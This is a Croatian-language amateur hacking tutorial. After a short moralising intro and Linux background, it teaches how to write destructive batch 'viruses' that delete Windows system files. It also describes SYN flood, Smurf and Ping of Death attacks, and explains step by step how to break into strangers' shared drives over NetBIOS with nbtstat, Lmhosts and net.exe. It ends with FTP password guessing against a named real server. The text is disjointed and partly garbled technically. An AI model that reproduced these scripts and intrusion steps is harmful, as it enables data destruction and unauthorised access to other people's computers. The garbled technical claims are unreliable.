Professional Documents
Culture Documents
Hacking I Cracking
Hacking I Cracking
============================
=========
1. DIO
Ko su HACKERI/CRACKERI?
Od same pojave Interneta i početka surfanja istim u svijetu se
vode velike polemike ko su hackeri i šta u stvari znači taj pojam?
Stručno objašnjenje bi bilo hacker je vrlo inteligentna, često
stručno obrazovana osoba u domeni kompjutera, elitni
programer i poznavatelj rada OS-a (operativnog sistema). Svoje
veliko znanje koristi za pronalazak nedostataka (rupa) u OS ili
nekom programu i nastoji te nedostatke popraviti.
Primjerice:
- Tim Backstone uči o računalnoj grafici. Svaki dan spoznaje
nove vještine crtanja raznih oblika. On uči zato jer očekuje da
će svojim znanjem imati financijsku korist.
- Gerald Winston je već zaposlen kao Windoows programer. On
uči o UNIX sigurnosti u svoje slobodno vrijeme. Svrha njegovog
učenja je da povisi reputaciju, tj. da njegov doprinos bude
zabilježen u javnosti i da njegovo ime bude poznato šire nego
već jest, a to će učiniti pišući tekstove i savjetujući korisnike
UNIXa.
- Mario Jurić je srednjoškolac. Polazi matematičku gimnaziju.
Njega fasciniraju kriptografski sustavi pa ih vjerno proučava.
Posjećuje forume i dopisuje se s ljudima koji se bave
kriptografskim sustavima. On to radi jer se nada da će tako
dobiti posao u budućnosti.
- Nenad Marić je također srednjoškolac. Polazi u opću
gimnaziju. Njega zanima računalna sigurnost i hackeri. On želi
postati hackerom jer želi haknuti mnogo servera i postati
slavan među hackerima.
Svi primjeri su izmišljeni, no, očito je da Nenad čini nešto krivo.
On od 'hakiranja' servera neće imati nikakvu korist, a kamo li
slavu. Bit će oštećen višestruko:
- financijski (mrežna oprema, mnogo potrošenih impulsa...)
- emocionalno (agresivnost i sebičnost će ojačati)
- socijalno (društvo će ga zanemariti, izgubit će dosadašnje
prijatelje, a nove će teško steći)
- 'reputacijski' tražit će ga MUP, FBI, Interpol... a to ovisi o
aktivnostima (koje bi vjerovatno bile ilegalne).
Stoga, dragi moji scripty kiddyji, lameri, newbaji i svi koji želite
postati hackerima, čitajte pažljivo. Ako želite biti hackerom (na
području računalne sigurnosti -
najčešće), činite ovako:
1. budite sigurni da to želite
2. vjerujte da to možete
3. očekujte korist od svoje aktivnosti i rada (financijska,
socijalna - novi prijatelji, reputacija - da postanete poznatiji,
kao primjer
drugima ili slično, ...)
4. nadajte se da će se ono što očekujete ispuniti
5. ustrajte u toj aktivnosti i ne odustajte odmah na prvoj
prepreci i nekom složenijem principu rada.
Treba dosta vremena i truda da se postane hacker, odnosno
'majstor'.
Sav materijal koji vam je potreban da postanete hacker pojasnit
ću u idućem poglavlju. Uz to možete potražiti savjet i na raznim
internetskim forumima od ljudi koji o tome više znaju. Možete
pitati i starije hackere. Primjerice: Želio bih naučiti što je više
moguće o tome pa pitam vas koji znate više od mene.
Ne bojte se reći da ste novi, da ne znate. Ako priznate da ne
znate,
uvijek će vam netko pomoći ako želite da vam se pomogne.
Kineska poslovica kaže:
"Kad je učenik spreman, pojavi se učitelj."
Linux? Šta je to? Treba li to ikome? Čemu sluzi? Valja li to? Radi li
to pod Windowsima? I jos tisuću pitanja o Linuxu. Šta je, zaista
Linux? Treba li vam? Možete li bez njega?
Već nekoliko godina koplja se lome oko Linuxa. Suprotstavljene su
dvije struje - jedna je velika grupa vjernih korisnika Microsoftovih
proizvoda koja Linux smatra promašajem, a druga je mala grupa
zadovoljnih korisnika Linuxa. Najčešće stvari koje se Linuxu
zamjeraju je "nekompaktibilnost s Windowsima" i nedostatak
programske podrške. Obje su tvrdnje netočne. Prva je, zapravo,
poluistinita - Windowsi ne mogu vrtiti niti jedan program pisan
pod Linuxom, ali Linux može vrtiti neke programe pisane pod
Windowsima. Druga tvrdnja je tvrdnja o nedostatku programske
podrške. Iako je dostupno na stotine megabajta programa koje je
Linux ili naslijedio ili su to potpuno novi programi, nepostojanje
MS Office paketa za Linux obično nepoznavatelje i kvazistručnjake
asocira na siromaštvo.
No, ostavimo igranje advokata za neku drugu priliku, u ovom
umetku imat ćete prilike upoznati Linux iznutra, što on stvarno
jest i o čemu se uopćeradi.
Prije nego nastavite pročitajte umetak do kraja da biste dobili
dojam o čemu se priča i o kakvoj se instalaciji uopće radi. Tek
onda možete kroz upute za instalaciju ići korak po korak.
Grafička kartica može biti bilo koja VGA kartica, čak i CGA, EGA ili
Hercules. Imate li negdje u prašnjavom podrumu Hercules karticu i
monitor možete i nju staviti u računalo, a Linux će ju moći
iskoristiti. Pristup vašeg Linux računala svijetu ostvarivat ćete
obično jedan od ova dva načina: Ethernet karticom ili modemom.
Zato je neophodno imati jedno
od to dvoje. S Ethernet karticama nema problema, podržano je sve
na što u normalnim uvjetima možete naići. Modem isto tako može
biti bilo koji, vanjski ili ugradivi. Poželjno je, uglavnom zbog
problema pri instalaciji, imati ATAPI CD-ROM. Razlika između
ATAPI i ostalih pogona je što se ATAPI pogoni vežu na HDD
kontroler, kao disk. Ostali se obično vežu na neku karticu u
računalu. Nemate li ATAPI CD-ROM, nemojte očajavati, Linux će
vjerojatno prepoznati i vaš. Ako ga ne prepozna, morat ćete mu
ručno objašnjavati koji pogon imate u računalu.
Komande
* RM (RMDIR)
Primjer: c:\> rm garnet -briše direktorij garnet
* REM - Komentar
Primjer: c:\> rem garnet i nhs-ac.cjb.net -ništa posebno
* PAUSE - Pauza
Primjer: c:\> pause -za daljni radi pritisnite ENTER
* /? - Help
(Za svaku ovu komandu možete upisati /? i dobit ćete pomoć za tu
komandu)
Primjer: c:\> attrib /?
Programi
* Program NET
* Program NBTSTAT
Nbtstat [-a remoteime] [-A ip adresa] [-c] [-n] [-R] [-r] [-S]
[-s]
Switchevi : -a Izlista imena remote kompjutera po tabeli zadanoj
za host ime.
-A Izlista imena remote kompjutera po tabeli zadanoj po IP
adresama
-c Izlista remote ime cache uključujući IP adresu.
-n Izlista lokalna NetBIOS imena
-r Izlista imena dobijna emitirane putem WWINS
-R Uzima i realod remote cache tabelu....<
-S Izlista sessione tabele sa destinacijom IP adresama
-s Izlista sessione tabele konverzije...
* Ping
2. DIO
Pravljenje Virusa
Primjer br.1
---------------
@echo off
cd\
rd windows
echo Sredio sam te
echo Pozdrav
end
--------------
Primjer br.2
--------------------
@echo off
cd\
cd windows
@del win.com
@del win.ini
echo Pokušaj sad popravit kompjuter
End
-------------------
Analiza virusa:
@echo off - govori kompjuteru da bude miran
cd\ - govori kompjuteru da ide na c:\
cd windows - govori kompjuteru da ide sa c:\ na c:\windows
@del win.com - govori kompjuteru da izbriše win.com iz
direktorija windows
@del win.ini - govori kompjuteru da izbriše win.ini iz direktorija
windows
echo Pokušaj sad popravit kompjuter ne treba pojašnjavati
End - kraj
* Land
Ovdje se radi o takvom napadu koji šalje na otvoreni port SYN
paket koji moze srušiti sistem.
* Smurf-napadi
Ovdje se šalje što više pingova da bi se dobio što veći broj
odgovora i tako bi srušio sistem žrtve. Za 100 pingova dobija se
1000 odgovora.
* SYN flood
Syn Flood radi tako što napadač šalje žrtvi Syn Request da se
konektira na server žrtve, a žrtva odgovara sa ACK, i rezervira
buffer (mjesto u memoriji) za tu konekciju. Napadač ne odgovara
sa ACK nego šalje SYN Request ponovo, i žrtva ponovo odgovara
sa ACK i odvaja buffer i sve tako dok žrtva neostane bez Buffer
Space i krašira se. Ovom vrstom
napada nećete nanijeti skoro nikakvu štetu WebMasteru. On će
morati, poslije SYN Flood Attacka, da rebootuje računalo. Poslije
slanja zadnjeg SYN-ACK, serveru je potrebno 96 sekundi da
dealocira prostor koji je bio zauzet.
* Ping of Death
Za ovaj napad služi obična komanda koja glasi: "ping adresa -n
9999999"
Kada se pošalje ova naredba na određeni server, onda on počinje
obrađivati, ali
pošto se poslalo oko milion pingova, onda server sporo obrađuje i
jednostavno se
sruši, dolazi do Buffer Overflow.
Međutim za ove napade je davno izašao patch i nevaži na jačim
serverima.
(Nemožete koristit ovaj napad sa slabijim računalima)
_-ŠTA JE POTREBNO-_
Za ovaj tutorial nije potrebno imati Unix. Bilo bi mnogo bolje imati
Unix, ali znam da
većinu mrzi da ga instalira. Sve u svemu potrebno je par wingate
adresa i shell account. Bez brige, objasnit ću što je što.
_-SHELL ACCOUNT-_
Ovo je najvažnija faza kod upadanja u neki site. Postoji više načina
i stvari koji se trebaju
otkriti. Treba otkriti Operativni sistem, otvorene portove, deamone
i verzije koji rade na serveru.
--Operativni sistem
Objasniću 2 načina. Prvi je da se telnetirate na server ako ima
otvoren telnet port 23. Tamo piše koji je Operativni Sistem.
Drugi način je netcraft.com Idite na taj site i kliknite na link na
kojem piše "Whats that site running" ili tako nešto. Idite na taj
link i upišite site koji vas zanima.
Tamo će pisati šta taj site ima. Postoji još načina, kao što je
nmap ...., ali ovo će biti dovoljno za početak.
_-ISKORISTITI RUPU-_
Ukoliko niste znali Windows ima opciju koja se zove File and Print
Sharing. Ovu opciju možete koristiti ukoliko želite dijeliti drive i
štampač sa drugima, što znači da ćete dati pristup ostalim ljudima
(cijeloj mreži) fajlovima i štampaču. Kada uključite ovu opciju, vi
zapravo ostavljate jedan port otvoren (port 139) koji prihvaća
konekciju i razumije NETBIOS protokol.
nbtstat -a IMEHOSTA
- ili
nbtstat -A IPADRESA
Kako ćete sada upasti? Lako! Prvo morate podesiti Lmhosts fajl
koji se nalazi u C:\Windows\Lmhosts (nema ekstenziju) uz pomoć
notepada, a ukoliko ga nema u Windows direktoriju, onda ga
napravite sami (samo ne zaboravite da se fajl zove 'Lmhosts' i da
nema ekstenziju). Da bi ste ga napravili samo otvorite Lmhosts fajl
u notepadu, unesite žrtvinu IP asresu, pritisnite TAB, i unesite
'Share Name' - ime koje ste našli uz pomoć nbtstat-a (u tabeli).
Sada snimite ovaj fajl i izađite iz notepada. Sada postoje tri načina
na koji možete pristupiti kompjuteru: najlaksi, laki i kul način!!!
[Najlakši način]
Imate IP adresu, imate Share name.. OK! Idite na START > RUN i samo
unesite slijedeće:
//IPADRESA/SHARENAME/
na primjer:
//123.45.67.8/hostbug/
Ovime će vam se pojaviti prozor sličan onome koji dobijete kada
kliknete na My Computer ikonu iz kojeg ćete moći pretraživati
žrtvin kompjuter.
[Laki način]
Ukoliko se ne želite previše mučiti onda samo idite na START /
FIND / COMPUTERS i unesite IP adresu kompjutera u koji želite
upasti. Ukoliko ste dobro konfigurirali Lmhosts fajl, izaćiće vam
prozor sa fajlovima iz žrtvinog kompjutera. Praktično, biće kao da
radite na svom kompjuteru.
[Kul način]
Za kul način upada u komp uz pomoć file shareinga biće vam
potreban program Net.exe. Savjetujem vas da prvo pročitate
pomoć tako što ćete unijeti net /?. (u DOS prozoru). Također
možete koristiti i komandu: net opcija /? - gdje je opcija određena
opcija za koju vam treba pomoć.
C:\windows\ftp.exe
Ovo znači da je FTP klijent pokrenut. Prije nego što počnete sa FTP
Hacking-om morate prethodno znati i FTP komande. Spisak komandi
ćete dobiti ako utipkate help:
ftp> help
Također možete umesto help utipkati i samo znak ?
Kada ovo utipkate dobićete listu FTP komandi koja izgleda ovako:
ftp> help CD
Connected to web2.mtnl.net.in.
220-
220-
#********************************************************
*****
220-# Welcome to MTNL's ftp site
220-
#********************************************************
*****
220-#
220-# You can upload your own homepages at this site!!!
220-#
220-# Just login with your username and upload the HTML pages.
220-# (You can use your favourite HTML editor as well)
220-#
220-# World will see it at http://web2.mtnl.net.in/~yourusername/
220-#
220-# So get going......UNLEASH YOUR CREATIVITY !!!!
220-#
220-
#********************************************************
*****
220-
220 ftp2.mtnl.net.in FTP server ready.
User (web2.mtnl.net.in:(none)): forbidden
331 Password required for forbidden.
Password:
admin 12345
administrator abc
pass qwerty
password
open
enter
Localhost --> Proxy Server --> FTP Server --> Proxy Server -->
Localhost
ftp> cd pass
Ovom komandom ući ćemo u direktorij (folder) pod imenom pass.
Pošto se sada nalazimo u folderu u kojem se nalazi željeni fajl koji
zelimo downloadirati, potrebno je izvesti slijedeći korak: